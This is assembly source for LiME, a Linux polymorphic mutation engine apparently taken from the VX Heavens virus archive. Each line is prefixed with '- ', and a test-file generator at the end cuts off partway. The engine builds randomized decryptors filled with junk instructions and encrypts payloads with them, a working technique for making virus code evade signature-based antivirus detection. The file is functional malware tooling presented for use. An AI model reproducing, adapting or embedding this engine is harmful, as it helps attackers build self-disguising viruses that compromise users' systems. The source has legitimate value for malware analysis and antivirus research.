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- ; This file passed through VX Heavens (
- ; ***************************************************************
- ; To compile [LiME] under Linux with NASM... Follow as:
- ; nasm -f elf lime-gen.s
- ; ld -e main lime-gen.o -o lime-gen
- ; ***************************************************************
- section .data
- global main
- ; ***************************************************************
- ; Linux Mutation Engine (source code)
- ; [LiME] Version: 0.2.0 Last update: 2001/02/28
- ; Written by zhugejin at Taipei, Taiwan. Date: 2000/10/10
- ; E-mail:
- ; WWW:
- ; ***************************************************************
- ; Input:
- ; EBX = pointer to memory buffer where LiME will store decryptor
- ; and encrypted data
- ; ECX = pointer to the data, u want to encrypt
- ; EDX = size of data, u want to encrypt
- ; EBP = delta offset
- ;
- ; Output:
- ; ECX = address of decryptor+encrypted data
- ; EDX = size of decryptor+encrypted data
- dd LIME_SIZE ; size of [LiME]
- lime_pre_opcod_tab db 10000000b ; add
- db 10101000b ; sub
- db 10110000b ; xor
- db 10000000b ; add
- lime_enc_opcod_tab db 80h,10000000b, 2ah,11000001b ; add/sub
- db 80h,10101000b, 02h,11000001b ; sub/add
- db 80h,10110000b, 32h,11000001b ; xor/xor
- db 82h,10000000b, 2ah,11000001b ; add/sub
- db 82h,10101000b, 02h,11000001b ; sub/add
- db 82h,10110000b, 32h,11000001b ; xor/xor
- db 0c0h,10000000b,0d2h,11001000b ; rol/ror
- db 0c0h,10001000b,0d2h,11000000b ; ror/rol
- db 0d0h,10000000b,0d0h,11001000b ; rol/ror
- db 0d0h,10001000b,0d0h,11000000b ; ror/rol
- db 0f6h,10010000b,0f6h,11010000b ; not/not
- db 0f6h,10011000b,0f6h,11011000b ; neg/neg
- db 0feh,10000000b,0feh,11001000b ; inc/dec
- db 0feh,10001000b,0feh,11000000b ; dec/inc
- db 00h,10000000b, 2ah,11000001b ; add/sub
- db 28h,10000000b, 02h,11000001b ; sub/add
- db 30h,10000000b, 32h,11000001b ; xor/xor
- ;--------------------------------------------
- db 10h,10000000b, 1ah,11000001b ; adc/sbb
- db 18h,10000000b, 12h,11000001b ; sbb/adc
- db 80h,10010000b, 1ah,11000001b ; adc/sbb
- db 80h,10011000b, 12h,11000001b ; sbb/adc
- db 82h,10010000b, 1ah,11000001b ; adc/sbb
- db 82h,10011000b, 12h,11000001b ; sbb/adc
- lime_zero_reg_opcod_tab db 29h,00011000b ; sub reg,reg
- db 2bh,00011000b ; sub reg,reg
- db 31h,00011000b ; xor reg,reg
- db 33h,00011000b ; xor reg,reg
- lime_init_reg_opcod_tab db 81h,11000000b ; add reg,xxxxxxxx
- db 81h,11001000b ; or reg,xxxxxxxx
- db 81h,11110000b ; xor reg,xxxxxxxx
- db 81h,11000000b ; add reg,xxxxxxxx
- ;-----------------------------------------------
- LIME_make_tsh_cod dd lime_make_tsh_cod
- LIME_make_noflags_cod dd lime_make_noflags_cod
- LIME_set_disp_reg dd lime_set_disp_reg
- LIME_save_edi dd lime_save_edi
- @ equ $
- LIME_rnd dd lime_rnd
- LIME_rnd_reg dd lime_rnd_reg
- LIME_rnd_al dd lime_rnd_al
- LIME_rnd_eax_and_al dd lime_rnd_eax_and_al
- LIME_rnd_esi dd lime_rnd_esi
- ;-----------------------------------------------
- lime_add4_reg_opcod_tab db 11000000b,11000000b,04h,-4h ; add/add
- db 11000000b,11101000b,-4h,04h ; add/sub
- db 11101000b,11101000b,-4h,04h ; sub/sub
- db 11101000b,11000000b,04h,-4h ; sub/add
- lime_mk_mov_cod_addr dw lime_mmc1-@,lime_mmc2-@,lime_mmc3-@
- lime_mk_inc_cod_addr dw lime_mic1-@,lime_mic2-@,lime_mic3-@
- lime_mk_jxx_cod_addr dw lime_mjc1-@,lime_mjc2-@
- lime_mk_tsh_cod_addr dw lime_mtc1-@,lime_mtc2-@,lime_mtc3-@,lime_mtc4-@
- dw lime_mtc5-@,lime_mtc6-@,lime_mtc7-@,lime_mtc8-@
- dw lime_mtc9-@
- ; dw lime_simd-@
- ; dw lime_3dnow-@
- jxx_addr dd 0
- ret_addr dd 0
- pre_addr dd 0
- pre_count db 0
- lime_rnd_val dd 0
- orig_reg db 0
- disp_reg db 0
- temp_reg db 0
- key_reg db 0
- ; +------------> make no-flags code
- ; |+-----------> *reserved* for SIMD Instruction
- ; ||+----------> *reserved* for 3DNow! Instruction
- ; ||| +------> xchg disp_reg with orig_reg
- ; ||| |
- para_eax db 00000000b ; parameters of LiME
- para_ebx dd 0 ; address of buffer for new decryptor
- para_ecx dd 0 ; begin of code to be decrypted
- para_edx dd 0 ; size of code to be decrypted
- para_ebp dd 0 ; displacement of decryptor
- para_esp dd 0
- ; +--------------------> byte / dword
- ; |+-------------------> mod := (disp32/disp8)
- ; ||+------------------> *not used*
- ; |||+-----------------> *not used*
- ; ||||+----------------> inc reg / dec reg
- ; |||||++--------------> *not used*
- ; |||||||+-------------> clc / stc
- enc_type dd 00000000b
- adr_ndx dd 0
- adr_0 dd 0,0,0,0,0,0,0,0
- adr_1 dd 0,0,0,0,0,0,0,0
- adr_2 dd 0,0,0,0,0,0,0,0
- adr_3 dd 0,0,0,0,0,0,0,0
- lime_mmx_opcod_tab:
- db 60h, 61h, 62h, 63h, 64h, 65h, 66h, 67h, 68h, 69h, 6ah, 6bh, 6eh, 6fh
- db 74h, 75h, 76h, 6eh, 6fh,0d1h,0d2h,0d3h,0d5h,0d8h,0d9h,0dbh,0dch,0ddh
- db 0dfh,0e1h,0e2h,0e5h,0e8h,0e9h,0ebh,0ech,0edh,0efh,0f1h,0f2h,0f3h,0f5h
- db 0f8h,0f9h,0fah,0fch,0fdh,0feh
- ; ---------------------------------------------------------------
- pushf
- cld
- mov edi,ebx
- push ebp
- call lime_reloc
- lime_reloc:
- pop ebp
- sub ebp,lime_reloc-@
- pop dword [ebp-@+para_ebp]
- mov [ebp-@+para_ebx],ebx
- mov [ebp-@+para_ecx],ecx
- mov [ebp-@+para_edx],edx
- mov [ebp-@+para_esp],esp
- call lime_make_prefix_decrypt ;
- mov [ebp-@+pre_addr],esp
- mov al,3
- call [ebp-@+LIME_rnd_eax_and_al]
- mov [ebp-@+adr_ndx],eax
- xchg ecx,eax
- inc ecx
- lea esi,[ebp-@+adr_0]
- lime_make_next_decrypt:
- call lime_make_decrypt ;
- ror dword [ebp-@+enc_type],8
- loop lime_make_next_decrypt
- call lime_encrypt ;
- mov ecx,[ebp-@+para_ebx]
- mov edx,edi
- sub edx,ecx
- mov esp,[ebp-@+para_esp]
- popf
- ret
- ; ---------------------------------------------------------------
- lime_make_prefix_decrypt:
- pop dword [ebp-@+ret_addr]
- call [ebp-@+LIME_make_tsh_cod]
- mov al,7
- call [ebp-@+LIME_rnd_eax_and_al]
- add al,7
- mov [ebp-@+pre_count],al
- xchg ecx,eax
- mk_next_prefix_decrypt:
- call [ebp-@+LIME_make_tsh_cod]
- call [ebp-@+LIME_set_disp_reg]
- call lime_make_mov_cod
- push edi ; p0
- stosd
- call lime_make_xchg_cod_rnd
- mov al,02h
- call [ebp-@+LIME_rnd_eax_and_al]
- add al,81h ; (add/sub/xor) dword [reg+(xxxxxx)xx],xxxxxxxx
- stosb
- push eax
- mov al,03h
- call [ebp-@+LIME_rnd_al]
- lea ebx,[ebp-@+lime_pre_opcod_tab]
- xlatb
- or al,[ebp-@+disp_reg]
- stosb
- pop ebx
- push edi ; p1
- call [ebp-@+LIME_rnd]
- stosd
- jp lmpd_a1
- xor byte [edi-05h],11000000b
- sub edi,byte 03h
- lmpd_a1:
- call [ebp-@+LIME_rnd]
- stosd
- cmp bl,83h
- jnz lmpd_a2
- sub edi,byte 03h
- lmpd_a2:
- loop mk_next_prefix_decrypt
- call [ebp-@+LIME_make_tsh_cod]
- push dword [ebp-@+ret_addr]
- ret
- ; ---------------------------------------------------------------
- lime_make_decrypt:
- push ecx
- call [ebp-@+LIME_make_tsh_cod]
- call [ebp-@+LIME_set_disp_reg]
- ; mov al,0cch
- ; stosb ; *test*
- call lime_make_mov_cod
- call [ebp-@+LIME_save_edi] ; a0 = disp value
- stosd
- call [ebp-@+LIME_make_tsh_cod]
- call [ebp-@+LIME_rnd]
- and al,11111001b
- mov [ebp-@+enc_type],al
- mov bl,al
- rol al,1
- mov ah,al
- call [ebp-@+LIME_rnd_reg]
- mov [ebp-@+key_reg],al
- shl ah,3
- or al,ah
- or al,0b0h ; mov reg,key
- stosb
- call [ebp-@+LIME_rnd]
- mov [esi+4*6],eax ; a7 = key
- stosd
- test bl,10000000b
- jnz lmd_a1
- sub edi,byte 03h
- lmd_a1:
- call [ebp-@+LIME_rnd]
- and al,00000010b
- mov [ebp-@+para_eax],al
- call lime_make_xchg_cod_rnd
- call [ebp-@+LIME_save_edi] ; a1 = address of loop
- call [ebp-@+LIME_make_tsh_cod]
- mov al,[ebp-@+disp_reg]
- mov [ebp-@+orig_reg],al
- push esi
- lea esi,[ebp-@+lime_enc_opcod_tab]
- mov al,22
- call [ebp-@+LIME_rnd_esi]
- add esi,eax
- cmp eax,byte 16*2
- pushf
- lodsd
- test bl,10000000b
- jz lmd_a2
- or eax,00010001h
- lmd_a2:
- popf
- push eax
- jbe mk_no_cf
- mov al,bl
- ; and al,01h
- or al,0f8h ; clc / stc
- stosb
- call [ebp-@+LIME_make_noflags_cod]
- mk_no_cf:
- pop eax
- pop esi
- mov bh,bl
- and bh,01000000b
- sub ah,bh
- mov [esi],eax ; a2 = decryptic type
- add esi,byte 04h
- or ah,[ebp-@+disp_reg]
- cmp al,40h
- jae lmd_a3
- mov dh,[ebp-@+key_reg]
- rol dh,3
- or ah,dh
- lmd_a3:
- stosw ; (add/sub/xor...) (b/w) [reg+(xxxxxx)xx],key
- xchg edx,eax
- call [ebp-@+LIME_rnd]
- jp lmd_a4
- and byte [edi-01h],11111000b
- or byte [edi-01h],00000100b
- and al,11000000b
- or al,00100000b
- or al,[ebp-@+disp_reg]
- stosb
- lmd_a4:
- call [ebp-@+LIME_save_edi] ; a3 = address of displacement
- call [ebp-@+LIME_rnd]
- stosd
- test bl,01000000b
- jz lmd_a5
- sub edi,byte 03h
- lmd_a5:
- cmp dl,0d0h
- jae mk_no_val
- cmp dl,40h
- jb mk_no_val
- call [ebp-@+LIME_rnd]
- and al,7fh
- stosd
- cmp dl,81h
- jz lmd_a6
- and eax,byte 7fh
- sub edi,byte 03h
- lmd_a6:
- mov [esi+4*3],eax ; a7 = key
- mk_no_val:
- call lime_make_xchg_cod_rnd
- call lime_make_inc_cod ; (inc/dec) reg
- call lime_make_xchg_cod_rnd
- mov ax,0f881h ; cmp reg,xxxxxxxx
- or ah,[ebp-@+disp_reg]
- stosw
- call lime_aox_eax
- call [ebp-@+LIME_save_edi] ; a4 = address of "cmp reg,xxxxxxxx"
- stosd
- call [ebp-@+LIME_make_noflags_cod]
- test byte [ebp-@+para_eax],00000010b
- jz mk_no_xchg
- mov al,04h
- call [ebp-@+LIME_rnd_eax_and_al]
- add al,87h ; xchg orig_reg,disp_reg
- stosb
- mov al,[ebp-@+orig_reg]
- mov ah,al
- xchg [ebp-@+disp_reg],al
- dec edi
- cmp ah,al
- jz mk_no_xchg
- inc edi
- rol ah,3
- or al,ah
- or al,11000000b
- cmp byte [edi-01h],87h
- jnz lmd_a7
- call lime_xchg_reg
- lmd_a7:
- stosb
- call [ebp-@+LIME_make_noflags_cod]
- mk_no_xchg:
- and byte [ebp-@+para_eax],11111101b
- call lime_make_jz_cod ; jxx (xxxxxx)xx
- call [ebp-@+LIME_save_edi] ; a5 = address of "jxx xx"
- call [ebp-@+LIME_make_noflags_cod]
- mov al,0e9h ; jmp xxxxxxxx
- stosb
- mov eax,[esi-5*4] ; address of loop
- sub eax,edi
- dec eax
- cmp eax,byte -80h
- jae mk_short_jmp
- sub eax,byte 03h
- stosd
- jmp short mk_jmp_end
- mk_short_jmp:
- mov byte [edi-01h],0ebh ; jmp xx
- stosb
- mk_jmp_end:
- call lime_rnd_trash
- call [ebp-@+LIME_save_edi] ; a6
- push esi
- mov esi,[esi-4*2] ; address of "jxx xx"
- mov eax,edi
- sub eax,esi
- cmp byte [esi-02h],00h
- jnz mk_jz_a
- sub esi,byte 03h
- mk_jz_a:
- mov [esi-01h],al
- pop esi
- add esi,byte 04h
- pop ecx
- ret
- ; -------------------------------
- ; ...
- ; mov reg,xxxxxxxx <---- a0
- ; ...
- ;a1:
- ; ...
- ; xor [eax+xx],key <---- a7
- ; ^^^(a2) ^^a3
- ; ...
- ; inc eax
- ; ...
- ; cmp eax,xxxxxxxx <---- a4
- ; ...
- ; jz a6
- ;a5:
- ; ...
- ; jmp a1
- ; ...
- ;a6:
- ; -------------------------------
- ; ---------------------------------------------------------------
- lime_encrypt:
- mov ecx,[ebp-@+para_edx]
- mov esi,[ebp-@+para_ecx]
- repz movsb
- push edi
- calc_disp:
- rol dword [ebp-@+enc_type],8
- mov eax,0aa9090ach
- test byte [ebp-@+enc_type],10000000b
- jz le_a1
- or eax,01000001h
- le_a1:
- mov [ebp-@+enc_buff-01h],eax
- lea esi,[ebp-@+adr_0]
- imul ebx,[ebp-@+adr_ndx],byte 4*8
- lea edx,[esi+ebx]
- mov eax,edi
- mov esi,edi
- sub eax,[edx+4*6]
- and al,11111100b
- add eax,byte 04h
- sub esi,eax
- mov eax,esi
- sub eax,[ebp-@+para_ebx]
- add eax,[ebp-@+para_ebp]
- mov ebx,[edx+4*3]
- mov ecx,[ebx]
- test byte [ebp-@+enc_type],01000000b
- jz le_a2
- movsx ecx,cl
- le_a2:
- sub eax,ecx
- mov ecx,[edx+4*7] ; decryptic value
- test byte [ebp-@+enc_type],00001000b
- jnz le_a3
- mov ebx,[edx] ; address of "mov reg,xxxxxxxx"
- mov [ebx],eax
- add eax,edi
- sub eax,esi
- mov ebx,[edx+4*4] ; address of "cmp reg,xxxxxxxx"
- jmp short le_a4
- le_a3:
- mov ebx,[edx+4*4] ; address of "cmp reg,xxxxxxxx"
- mov [ebx],eax
- add eax,edi
- sub eax,esi
- mov ebx,[edx] ; address of "mov reg,xxxxxxxx"
- le_a4:
- mov [ebx],eax
- ; jmp _test1_lime_encrypt ; *test*
- mov eax,[edx+4*2] ; decryptic type
- shr eax,16
- mov [ebp-@+enc_buff],ax
- mov ebx,edi
- mov edi,esi
- mov al,[ebp-@+enc_type]
- ; and al,1
- or al,0f8h ; clc / stc
- mov [ebp-@+enc_buff-02h],al
- encrypt_prog:
- db 90h
- lodsb ; 0ach
- enc_buff db 90h,90h
- stosb ; 0aah
- cmp esi,ebx
- jb encrypt_prog
- _test1_lime_encrypt:
- cmp byte [ebp-@+adr_ndx],0
- jz lime_prefix_encrypt
- dec byte [ebp-@+adr_ndx]
- jmp calc_disp
- ; ---------------------------------------------------------------
- lime_prefix_encrypt:
- ; jmp _test2_lime_encrypt ; *test*
- movzx ecx,byte [ebp-@+pre_count]
- mov edi,[ebp-@+pre_addr]
- lpe_next:
- mov al,1fh
- call [ebp-@+LIME_rnd_eax_and_al]
- add eax,[ebp-@+adr_0+4*1] ; address of loop
- mov ebx,eax
- sub eax,[ebp-@+para_ebx]
- add eax,[ebp-@+para_ebp]
- mov esi,[edi]
- mov edx,[esi]
- push esi
- add esi,byte 04h
- test byte [esi-05h],01000000b
- jz lpe_a1
- movsx edx,dl
- sub esi,byte 03h
- lpe_a1:
- sub eax,edx
- mov edx,[edi+04h]
- mov [edx],eax
- add edi,byte 08h
- mov edx,[esi]
- pop esi
- mov eax,[esi-02h]
- cmp al,83h
- jnz lpe_a2
- movsx edx,dl
- lpe_a2:
- and ah,00111000b
- jz lpe_sub
- cmp ah,00101000b
- jz lpe_add
- xor [ebx],edx
- loop lpe_next
- jmp short lime_encrypt_end
- lpe_sub:
- sub [ebx],edx
- loop lpe_next
- jmp short lime_encrypt_end
- lpe_add:
- add [ebx],edx
- loop lpe_next
- _test2_lime_encrypt:
- lime_encrypt_end:
- pop edi
- call lime_rnd_trash
- ret
- ; ---------------------------------------------------------------
- lime_set_disp_reg:
- push edx
- lsdr_l:
- mov al,111b
- call [ebp-@+LIME_rnd_al]
- cmp al,100b
- jz lsdr_l
- mov dl,[ebp-@+key_reg]
- test bl,10000000b
- jnz lsdr_a
- and dl,011b
- lsdr_a:
- cmp al,dl
- jz lsdr_l
- cmp al,[ebp-@+disp_reg]
- jz lsdr_l
- mov [ebp-@+disp_reg],al
- mov [ebp-@+temp_reg],al
- pop edx
- ret
- lime_rnd:
- push edx
- rdtsc
- xor eax,[ebp-@+lime_rnd_val]
- adc eax,edi
- neg eax
- sbb eax,edx
- rcr eax,1
- xor [ebp-@+lime_rnd_val],eax
- pop edx
- ret
- lime_rnd_eax_and_al:
- push edx
- movzx edx,al
- call [ebp-@+LIME_rnd]
- and eax,edx
- pop edx
- ret
- lime_rnd_al:
- push edx
- mov edx,eax
- lra_l:
- call [ebp-@+LIME_rnd]
- cmp al,dl
- ja lra_l
- mov dl,al
- xchg eax,edx
- pop edx
- ret
- lime_rnd_esi:
- and eax,byte 07fh
- call [ebp-@+LIME_rnd_al]
- add eax,eax
- add esi,eax
- ret
- lime_rnd_addr:
- call [ebp-@+LIME_rnd_esi]
- movzx eax,word [esi]
- lea esi,[eax+@]
- ret
- lime_save_edi:
- mov [esi],edi
- add esi,byte 04h
- ret
- lime_rnd_reg_dd:
- mov al,01h
- lime_rnd_reg:
- push ecx
- push edx
- xchg edx,eax
- lrr_l:
- mov al,111b
- call [ebp-@+LIME_rnd_al]
- mov ah,al
- test dl,01h
- jnz lrr_w
- and al,011b
- lrr_w:
- cmp al,100b
- jz lrr_l
- cmp al,[ebp-@+disp_reg]
- jz lrr_l
- cmp al,[ebp-@+temp_reg]
- jz lrr_l
- and al,011b
- mov cl,[ebp-@+key_reg]
- and cl,011b
- cmp al,cl
- jz lrr_l
- mov dl,ah
- xchg eax,edx
- pop edx
- pop ecx
- ret
- lime_rnd_trash:
- push ecx
- mov al,3
- call [ebp-@+LIME_rnd_eax_and_al]
- or al,04h
- xchg ecx,eax
- lrt_l:
- call [ebp-@+LIME_rnd]
- stosb
- loop lrt_l
- pop ecx
- ret
- lime_rnd_rm:
- push edx
- xor edx,edx
- mov dl,al
- mov ah,al
- rol ah,3
- mov al,[edi-01h]
- call [ebp-@+LIME_rnd_reg]
- or ah,al
- rol ah,3
- mov al,[edi-01h]
- call [ebp-@+LIME_rnd_reg]
- or al,ah
- stosb
- cmp dl,11b
- jz lrr_a2
- and al,11000111b
- push eax
- cmp eax,edi
- jp lrr_a1
- or ah,00000100b
- mov [edi-01h],ah
- mov ah,al
- mov al,0ffh
- call [ebp-@+LIME_rnd_al]
- and al,11111000b
- xor al,ah
- stosb
- lrr_a1:
- call [ebp-@+LIME_rnd]
- stosd
- pop eax
- cmp al,00000101b
- jz lrr_a2
- cmp dl,10b
- je lrr_a2
- sub edi,byte 04h
- add edi,edx
- lrr_a2:
- pop edx
- ret
- lime_xchg_reg:
- push edx
- cmp eax,edi
- jp lxr_e
- and al,00111111b
- mov edx,eax
- shr al,3
- shl dl,3
- or al,dl
- or al,11000000b
- lxr_e:
- pop edx
- ret
- lime_aox_eax:
- cmp eax,edi
- jp lae_e
- test byte [edi-01h],111b
- jnz lae_e
- dec edi
- mov al,[edi]
- dec edi
- and al,00111000b
- or al,00000101b
- stosb
- lae_e:
- ret
- ; ---------------------------------------------------------------
- lime_make_mov_cod:
- push esi
- lea esi,[ebp-@+lime_mk_mov_cod_addr]
- mov al,02h
- call lime_rnd_addr
- call esi
- pop esi
- ret
- lime_mmc1:
- mov al,0b8h ; mov reg,xxxxxxxx
- or al,[ebp-@+disp_reg]
- stosb
- ret
- lime_mmc2: ; set reg=0 / (add/or/xor) reg,xx
- lea esi,[ebp-@+lime_zero_reg_opcod_tab]
- mov al,03h
- call [ebp-@+LIME_rnd_esi]
- lodsd
- or ah,[ebp-@+disp_reg]
- rol ah,3
- or ah,[ebp-@+disp_reg]
- stosw
- call lime_make_xchg_cod_rnd
- lea esi,[ebp-@+lime_init_reg_opcod_tab]
- mov al,03h
- call [ebp-@+LIME_rnd_esi]
- lodsd
- or ah,[ebp-@+disp_reg]
- stosw
- call lime_aox_eax
- ret
- lime_mmc3:
- mov ax,0a08dh ; lea reg,xxxxxxxx
- or ah,[ebp-@+disp_reg]
- rol ah,3
- stosw
- ret
- lime_make_xchg_cod_rnd:
- cmp eax,edi
- jp lime_mxc_e
- or byte [ebp-@+para_eax],00000010b
- call [ebp-@+LIME_make_tsh_cod]
- mov dl,[ebp-@+disp_reg]
- mov al,07h
- call [ebp-@+LIME_rnd_eax_and_al]
- test byte [ebp-@+key_reg],011b
- jz lime_mxc_a1
- test al,100b
- jnz lime_mxc_a6
- lime_mxc_a1:
- and al,011b
- test al,01b
- jz lime_mxc_a4
- cmp dl,101b
- jnz lime_mxc_a2
- and al,01b
- lime_mxc_a2:
- add al,8ah
- stosb
- call [ebp-@+LIME_set_disp_reg]
- rol al,3
- or al,dl
- stosb
- cmp byte [edi-02h],8dh
- jz lime_mxc_a3
- or byte [edi-01h],11000000b
- lime_mxc_a3:
- jmp short lime_mxc_e
- lime_mxc_a4:
- add ax,1887h ; mov ah,00011regb
- stosb
- or ah,[ebp-@+disp_reg]
- rol ah,3
- call [ebp-@+LIME_set_disp_reg]
- or al,ah
- cmp byte [edi-01h],87h
- jnz lime_mxc_a5
- call lime_xchg_reg
- lime_mxc_a5:
- stosb
- lime_mxc_e:
- call [ebp-@+LIME_make_tsh_cod]
- ret
- lime_mxc_a6:
- call [ebp-@+LIME_set_disp_reg]
- cmp dl,000b
- jz lime_mxc_a7
- mov al,90h
- or al,dl
- mov byte [ebp-@+disp_reg],00h
- jmp short lime_mxc_a5
- lime_mxc_a7:
- call [ebp-@+LIME_set_disp_reg]
- or al,90h
- jmp short lime_mxc_a5
- ; ---------------------------------------------------------------
- lime_make_inc_cod:
- push esi
- lea esi,[ebp-@+lime_mk_inc_cod_addr]
- mov al,01h
- call lime_rnd_addr
- mov al,bl
- and al,00001000b
- or al,[ebp-@+disp_reg]
- test bl,10000000b
- jz lime_mic_t
- lea esi,[ebp-@+lime_mic3]
- lime_mic_t:
- call esi
- pop esi
- ret
- lime_mic1:
- or al,40h ; (inc/dec) reg
- stosb
- ret
- lime_mic2:
- or al,11000000b
- mov ah,al
- mov al,0ffh ; (inc/dec) reg
- stosw
- ret
- lime_mic3: ; (add/sub) reg,xx / (add/sub) reg,xx
- mov al,81h
- stosb
- lea esi,[ebp-@+lime_add4_reg_opcod_tab]
- mov al,03h
- call [ebp-@+LIME_rnd_esi]
- add esi,eax
- mov edx,[esi]
- mov al,dl
- or al,[ebp-@+disp_reg]
- stosb
- call lime_aox_eax
- call [ebp-@+LIME_rnd]
- stosd
- xchg ecx,eax
- push edx
- call lime_make_xchg_cod_rnd
- pop edx
- mov al,81h
- stosb
- mov al,dh
- or al,[ebp-@+disp_reg]
- stosb
- call lime_aox_eax
- cmp dh,dl
- jnz lime_mic3_a1
- neg ecx
- lime_mic3_a1:
- xchg eax,edx
- shr eax,16
- test bl,00001000b
- jz lime_mic3_a2
- shr eax,8
- lime_mic3_a2:
- movsx eax,al
- add eax,ecx
- stosd
- ret
- ; ---------------------------------------------------------------
- lime_make_jz_cod:
- push esi
- lea esi,[ebp-@+lime_mk_jxx_cod_addr]
- mov al,01h
- call lime_rnd_addr
- mov al,01h
- call [ebp-@+LIME_rnd_al]
- test bl,00001000b
- call esi
- pop esi
- ret
- lime_mjc1:
- jz lime_mjc1_a
- mov al,0ffh
- lime_mjc1_a:
- add al,73h ; jz(ae/b) xx
- stosw
- ret
- lime_mjc2:
- mov ah,al
- jz lime_mjc2_a
- mov ah,0ffh
- lime_mjc2_a:
- add ah,83h ; jz(ae/b) xxxxxxxx
- mov al,0fh
- stosw
- xor eax,eax
- stosd
- ret
- ; ---------------------------------------------------------------
- lime_make_noflags_cod:
- or byte [ebp-@+para_eax],10000000b
- call [ebp-@+LIME_make_tsh_cod]
- and byte [ebp-@+para_eax],01111111b
- ret
- lime_make_tsh_cod:
- ; ret ; *test*
- push ebx
- push ecx
- push edx
- push esi
- mov al,3
- call [ebp-@+LIME_rnd_eax_and_al]
- or eax,byte 01h
- xchg ecx,eax
- lmtc_l:
- lea esi,[ebp-@+lime_mk_tsh_cod_addr]
- xor eax,eax
- mov al,08h
- test byte [ebp-@+para_eax],10000000b
- jz lmtc_t1
- mov al,03h
- lmtc_t1:
- call [ebp-@+LIME_rnd_al]
- rol eax,1
- add esi,eax
- movzx eax,word [esi]
- lea esi,[eax+@]
- call [ebp-@+LIME_rnd]
- call esi
- mov esi,[ebp-@+jxx_addr]
- or esi,esi
- jz lmtc_t2
- mov eax,edi
- sub eax,esi
- cmp eax,byte 02h
- jbe lmtc_t2
- mov [esi-01h],al
- and dword [ebp-@+jxx_addr],byte 00h
- lmtc_t2:
- loop lmtc_l
- and dword [ebp-@+jxx_addr],byte 00h
- pop esi
- pop edx
- pop ecx
- pop ebx
- ret
- lime_mtc1: ; 8087
- and al,00000100b
- or al,0d8h
- stosb
- lmtc1_a1:
- mov al,ah
- and ah,00000111b
- cmp ah,00000101b
- jnz lmtc1_a2
- and al,00111111b
- stosb
- mov al,7fh
- call [ebp-@+LIME_rnd_eax_and_al]
- add eax,[ebp-@+para_ebp]
- stosd
- ret
- lmtc1_a2:
- or al,11000000b
- stosb
- ret
- lime_mtc2:
- mov al,0fh
- call [ebp-@+LIME_rnd_al]
- or al,80h
- cmp al,8dh ; lea reg,[reg]
- jz lmtc2_a
- cmp al,8bh
- ja lime_mtc2
- cmp al,86h
- jb lime_mtc2
- stosb ; (xchg/mov) reg,reg
- mov al,11b
- call lime_rnd_rm
- jmp short lime_mtc2
- lmtc2_a:
- stosb
- mov al,10b
- call [ebp-@+LIME_rnd_al]
- call lime_rnd_rm
- ret
- lime_mtc3: ; MMX
- push eax
- mov al,0fh
- stosb
- lea ebx,[ebp-@+lime_mmx_opcod_tab]
- mov al,2fh
- call [ebp-@+LIME_rnd_al]
- xlatb
- stosb
- pop eax
- or al,11000000b
- stosb
- ret
- lime_mtc4:
- and al,01h
- mov dl,al
- shl dl,3
- call [ebp-@+LIME_rnd_reg]
- or al,0b0h ; mov reg,xxxxxx(xx)
- or al,dl
- stosb
- cmp al,0b8h
- jb lmtc4_a
- call [ebp-@+LIME_rnd]
- and eax,0bfff83ffh
- stosd
- ret
- lmtc4_a:
- call [ebp-@+LIME_rnd]
- stosb
- ret
- lime_mtc5:
- and al,03h
- or al,80h ; (add/or/adc/sbb/and/sub/xor/cmp) reg,xx
- stosb
- call [ebp-@+LIME_rnd_reg]
- or al,11000000b
- stosb
- call [ebp-@+LIME_rnd]
- and eax,83ffbfffh
- stosd
- cmp byte [edi-06h],81h
- jz lime_mtc5_a
- sub edi,byte 03h
- lime_mtc5_a:
- ; ret
- lime_mtc6:
- cmp dword [ebp-@+jxx_addr],byte 00h
- jnz lime_mtc4
- mov al,0fh
- call [ebp-@+LIME_rnd_eax_and_al]
- or al,70h ; jxx xx
- stosw
- mov [ebp-@+jxx_addr],edi
- call lime_mtc5
- ret
- lime_mtc7:
- jp lime_mtc7_a
- and al,01h
- or al,0feh ; (inc/dec) reg
- stosb
- call [ebp-@+LIME_rnd_reg]
- and ah,00001000b
- or al,11000000b
- or al,ah
- stosb
- ret
- lime_mtc7_a:
- call lime_rnd_reg_dd
- and ah,00001000b
- or ah,40h ; (inc/dec) reg
- or al,ah
- stosb
- ret
- lime_mtc8:
- ; ret
- call lime_rnd_reg_dd
- mov dl,al
- mov [ebp-@+temp_reg],al
- or al,0b8h ; mov reg,xxxxxxxx
- stosb
- call [ebp-@+LIME_rnd]
- stosd
- push edi
- push eax
- call [ebp-@+LIME_make_noflags_cod]
- call [ebp-@+LIME_rnd]
- and al,08h
- or al,40h ; (inc/dec) reg
- or al,[ebp-@+temp_reg]
- stosb
- push eax
- call [ebp-@+LIME_make_noflags_cod]
- mov ax,0f881h ; cmp reg,xxxxxxxx
- or ah,[ebp-@+temp_reg]
- stosw
- mov al,7fh
- call [ebp-@+LIME_rnd_eax_and_al]
- or al,10h
- pop edx
- test dl,08h
- pop edx
- jnz lime_mtc8_a1
- add eax,edx
- jmp short lime_mtc8_a2
- lime_mtc8_a1:
- xchg eax,edx
- sub eax,edx
- lime_mtc8_a2:
- stosd
- call [ebp-@+LIME_make_noflags_cod]
- mov al,[ebp-@+disp_reg]
- mov [ebp-@+temp_reg],al
- mov al,75h ; jnz xx
- stosw
- cmp eax,edi
- jp lime_mtc8_a3
- pop eax
- sub eax,edi
- cmp eax,byte -80h
- jb lime_mtc8_a4
- mov [edi-01h],al
- ret
- lime_mtc8_a3:
- pop eax
- lime_mtc8_a4:
- push edi
- call lime_rnd_trash
- pop edx
- mov eax,edi
- sub eax,edx
- mov [edx-01h],al
- ret
- lime_mtc9: ; (add/or/adc/sbb/and/sub/xor/cmp) reg,reg
- call [ebp-@+LIME_rnd]
- and al,00111011b
- stosb
- call [ebp-@+LIME_rnd_reg]
- or al,00011000b
- rol al,3
- mov ah,al
- mov al,[edi-01h]
- call [ebp-@+LIME_rnd_reg]
- or al,ah
- stosb
- ret
- ; ---------------------------------------------------------------
- ; ***************************************************************
- ; [LiME] test files generator
- ; ***************************************************************
- main:
- mov eax,4
- mov ebx,1
- mov ecx,gen_msg
- mov edx,gen_msg_len
- int 80h
- mov ecx,50
- gen_l1:
- push ecx
- mov eax,8
- mov ebx,filename
- mov ecx,000111111101b ; 000rwxrwxrwx
- int 80h
- push eax
- mov eax,0
- mov ebx,host_entry
- mov ecx,host
- mov edx,host_len
- mov ebp,[e_entry]
- call LIME
- pop ebx
- mov eax,4
- mov ecx,elf_head
- add edx,host_entry-elf_head
- mov [p_filsz],edx
- mov [p_memsz],edx
- int 80h
- mov eax,6
- int 80h
- lea ebx,[filename+1]
